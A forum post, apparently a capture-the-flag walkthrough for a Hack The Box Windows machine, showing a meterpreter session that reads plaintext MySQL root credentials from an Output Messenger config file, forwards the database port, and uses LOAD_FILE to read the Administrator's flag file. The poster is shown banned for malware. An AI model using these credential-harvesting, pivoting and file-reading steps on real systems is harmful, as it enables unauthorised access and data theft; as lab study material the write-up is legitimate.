09-01-2024, 05:17 PM
(This post was last modified: 09-01-2024, 05:17 PM by HTBcracker.)
credentials leak for mysql
portforward mysql
[*]
connect to mysql
[*]
load root file
meterpreter > dir
Listing: C:\ProgramData\Output Messenger Server\Temp
====================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 15702539 fil 2024-02-19 16:51:30 +0100 OutputMessengerApache.zip
100666/rw-rw-rw- 25477937 fil 2024-02-19 16:51:52 +0100 OutputMessengerMysql.zip
100666/rw-rw-rw- 3369187 fil 2024-02-19 16:52:02 +0100 OutputWall.zip
100777/rwxrwxrwx 6554576 fil 2024-02-19 16:51:12 +0100 vcredist_x86.exe~ ls
OutputMessengerMysql.zip OutputMysql.ini backup data mysql settings
~ cat OutputMysql.ini
---
[DBCONFIG]
DBUsername=root
DBPassword=ibWijteig5
DBName=outputwall
---portforward mysql
meterpreter > portfwd add -l 14406 -p 14406 -r 10.129.14.214
[*]Forward TCP relay created: (local) :14406 -> (remote) 10.129.14.214:14406connect to mysql
~ mysql -h 127.0.0.1 -P 14406 -u root --skip-ssl -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 4
Server version: 10.1.19-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>load root file
MariaDB [(none)]> SELECT LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt');
+----------------------------------------------------------+
| LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt') |
+----------------------------------------------------------+
| REDACTED
|
+----------------------------------------------------------+
1 row in set (1.674 sec)
Ban reason: Malware. /Thread-Shellter-Pro-v4-7-x86-NOT-WORKING-crack (Permanent)
